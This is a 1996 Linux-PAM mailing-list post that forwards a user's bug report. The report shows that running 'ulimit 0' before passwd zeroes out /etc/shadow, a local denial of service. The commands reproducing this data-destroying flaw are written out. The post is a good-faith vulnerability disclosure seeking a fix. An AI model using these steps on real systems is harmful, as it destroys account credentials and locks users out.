
passwd module attack...



This isn't too hard to deal with in the passwd module; does someone
want to deal with this before .53 is released?

Also, should the framework protect against attacks like this and
thereby make it easier to write modules?

michaelkjohnson

------- Forwarded Message

From: Cedric Maion <cmaion@I209-b.resI.insa-lyon.fr>
To: "'johnsonm@redhat.com'" <johnsonm@redhat.com>
Subject: Denial of service attack with passwd !
Date: Sun, 6 Oct 1996 02:54:45 +0100

Hello

I'm using PAM and shadow-utils on my Linux box. Great. That's pretty cool, but....
It sounds terrible, but everybody could easily zero my /etc/shadow file... !!!!

All you need is to type :

$ ulimit 0
$ passwd
Password:
New passsword:
New password (again):
Password changed
passwd: all authentification tokens updated successfully

Then :
$ ls -al /etc/shadow
-r--------   1 root            0 Oct   6 02:37 shadow

Argh !  :-(

I am sending this to you because I do not really know where I should post this, but I think it may be linked with PAM (or at least with passwd).

Could you contact the right person ?


Thanks in advance !

       Cedric Maion


--
Cedric Maion

WWW :
   http://Aurora.resI.insa-lyon.fr/

Email :
   cmaion@Aurora.resI.insa-lyon.fr
   cmaion@ifhamy.insa-lyon.fr
   -- PGP public key available --

------- End of Forwarded Message




